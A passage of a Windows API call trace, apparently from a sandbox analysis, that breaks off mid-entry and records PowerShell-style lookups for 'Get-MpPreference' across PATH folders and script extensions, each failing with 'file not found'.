[0143.200] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2bb368, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.200] GetLastError () returned 0xcb [0143.213] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3545a8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0143.213] GetLastError () returned 0xcb [0143.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0143.224] GetLastError () returned 0xcb [0143.224] SetErrorMode (uMode=0x1) returned 0x1 [0143.226] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.ps1", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.227] GetLastError () returned 0x2 [0143.227] SetErrorMode (uMode=0x1) returned 0x1 [0143.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0143.229] GetLastError () returned 0x2 [0143.229] SetErrorMode (uMode=0x1) returned 0x1 [0143.229] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.psm1", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.229] GetLastError () returned 0x2 [0143.229] SetErrorMode (uMode=0x1) returned 0x1 [0143.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0143.230] GetLastError () returned 0x2 [0143.230] SetErrorMode (uMode=0x1) returned 0x1 [0143.230] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.psd1", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.230] GetLastError () returned 0x2 [0143.230] SetErrorMode (uMode=0x1) returned 0x1 [0143.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0143.230] GetLastError () returned 0x2 [0143.230] SetErrorMode (uMode=0x1) returned 0x1 [0143.230] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.COM", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.230] GetLastError () returned 0x2 [0143.230] SetErrorMode (uMode=0x1) returned 0x1 [0143.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0143.230] GetLastError () returned 0x2 [0143.230] SetErrorMode (uMode=0x1) returned 0x1 [0143.231] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.EXE", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.231] GetLastError () returned 0x2 [0143.231] SetErrorMode (uMode=0x1) returned 0x1 [0143.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0143.231] GetLastError () returned 0x2 [0143.231] SetErrorMode (uMode=0x1) returned 0x1 [0143.232] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.BAT", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.232] GetLastError () returned 0x2 [0143.232] SetErrorMode (uMode=0x1) returned 0x1 [0143.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0143.232] GetLastError () returned 0x2 [0143.232] SetErrorMode (uMode=0x1) returned 0x1 [0143.232] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.CMD", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.232] GetLastError () returned 0x2 [0143.232] SetErrorMode (uMode=0x1) returned 0x1 [0143.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0143.232] GetLastError () returned 0x2 [0143.232] SetErrorMode (uMode=0x1) returned 0x1 [0143.233] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.VBS", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.233] GetLastError () returned 0x2 [0143.233] SetErrorMode (uMode=0x1) returned 0x1 [0143.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0143.233] GetLastError () returned 0x2 [0143.233] SetErrorMode (uMode=0x1) returned 0x1 [0143.233] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.VBE", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.233] GetLastError () returned 0x2 [0143.233] SetErrorMode (uMode=0x1) returned 0x1 [0143.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0143.233] GetLastError () returned 0x2 [0143.233] SetErrorMode (uMode=0x1) returned 0x1 [0143.233] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.JS", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.233] GetLastError () returned 0x2 [0143.233] SetErrorMode (uMode=0x1) returned 0x1 [0143.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0143.234] GetLastError () returned 0x2 [0143.234] SetErrorMode (uMode=0x1) returned 0x1 [0143.234] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.JSE", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.234] GetLastError () returned 0x2 [0143.234] SetErrorMode (uMode=0x1) returned 0x1 [0143.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0143.234] GetLastError () returned 0x2 [0143.234] SetErrorMode (uMode=0x1) returned 0x1 [0143.234] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.WSF", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.234] GetLastError () returned 0x2 [0143.234] SetErrorMode (uMode=0x1) returned 0x1 [0143.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0143.234] GetLastError () returned 0x2 [0143.234] SetErrorMode (uMode=0x1) returned 0x1 [0143.235] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.WSH", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.235] GetLastError () returned 0x2 [0143.235] SetErrorMode (uMode=0x1) returned 0x1 [0143.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0143.235] GetLastError () returned 0x2 [0143.235] SetErrorMode (uMode=0x1) returned 0x1 [0143.235] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.MSC", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.235] GetLastError () returned 0x2 [0143.235] SetErrorMode (uMode=0x1) returned 0x1 [0143.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0143.235] GetLastError () returned 0x2 [0143.235] SetErrorMode (uMode=0x1) returned 0x1 [0143.235] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.236] GetLastError () returned 0x2 [0143.236] SetErrorMode (uMode=0x1) returned 0x1 [0143.238] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0143.238] GetLastError () returned 0x2 [0143.238] SetErrorMode (uMode=0x1) returned 0x1 [0143.238] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.ps1", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.239] GetLastError () returned 0x2 [0143.239] SetErrorMode (uMode=0x1) returned 0x1 [0143.239] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0143.239] GetLastError () returned 0x2 [0143.239] SetErrorMode (uMode=0x1) returned 0x1 [0143.239] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.psm1", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.239] GetLastError () returned 0x2 [0143.239] SetErrorMode (uMode=0x1) returned 0x1 [0143.239] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0143.239] GetLastError () returned 0x2 [0143.239] SetErrorMode (uMode=0x1) returned 0x1 [0143.239] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.psd1", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.239] GetLastError () returned 0x2 [0143.240] SetErrorMode (uMode=0x1) returned 0x1 [0143.240] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0143.240] GetLastError () returned 0x2 [0143.240] SetErrorMode (uMode=0x1) returned 0x1 [0143.240] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.COM", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.240] GetLastError () returned 0x2 [0143.240] SetErrorMode (uMode=0x1) returned 0x1 [0143.240] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0143.240] GetLastError () returned 0x2 [0143.240] SetErrorMode (uMode=0x1) returned 0x1 [0143.240] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.EXE", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.240] GetLastError () returned 0x2 [0143.240] SetErrorMode (uMode=0x1) returned 0x1 [0143.240] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0143.240] GetLastError () returned 0x2 [0143.241] SetErrorMode (uMode=0x1) returned 0x1 [0143.241] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.BAT", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.241] GetLastError () returned 0x2 [0143.241] SetErrorMode (uMode=0x1) returned 0x1 [0143.241] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0143.241] GetLastError () returned 0x2 [0143.241] SetErrorMode (uMode=0x1) returned 0x1 [0143.241] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.CMD", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.241] GetLastError () returned 0x2 [0143.241] SetErrorMode (uMode=0x1) returned 0x1 [0143.241] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0143.241] GetLastError () returned 0x2 [0143.269] SetErrorMode (uMode=0x1) returned 0x1 [0143.269] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.VBS", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.269] GetLastError () returned 0x2 [0143.269] SetErrorMode (uMode=0x1) returned 0x1 [0143.269] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0143.269] GetLastError () returned 0x2 [0143.269] SetErrorMode (uMode=0x1) returned 0x1 [0143.270] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.VBE", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.270] GetLastError () returned 0x2 [0143.270] SetErrorMode (uMode=0x1) returned 0x1 [0143.270] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0143.270] GetLastError () returned 0x2 [0143.270] SetErrorMode (uMode=0x1) returned 0x1 [0143.270] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.JS", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.270] GetLastError () returned 0x2 [0143.270] SetErrorMode (uMode=0x1) returned 0x1 [0143.270] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0143.270] GetLastError () returned 0x2 [0143.270] SetErrorMode (uMode=0x1) returned 0x1 [0143.270] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.JSE", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.271] GetLastError () returned 0x2 [0143.271] SetErrorMode (uMode=0x1) returned 0x1 [0143.271] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0143.271] GetLastError () returned 0x2 [0143.271] SetErrorMode (uMode=0x1) returned 0x1 [0143.271] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.WSF", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.271] GetLastError () returned 0x2 [0143.271] SetErrorMode (uMode=0x1) returned 0x1 [0143.271] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0143.271] GetLastError () returned 0x2 [0143.271] SetErrorMode (uMode=0x1) returned 0x1 [0143.271] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.WSH", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.271] GetLastError () returned 0x2 [0143.272] SetErrorMode (uMode=0x1) returned 0x1 [0143.272] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0143.272] GetLastError () returned 0x2 [0143.272] SetErrorMode (uMode=0x1) returned 0x1 [0143.272] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.MSC", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.272] GetLastError () returned 0x2 [0143.272] SetErrorMode (uMode=0x1) returned 0x1 [0143.272] GetFullPathNameW (in: lpFileName="C:\\Windows", 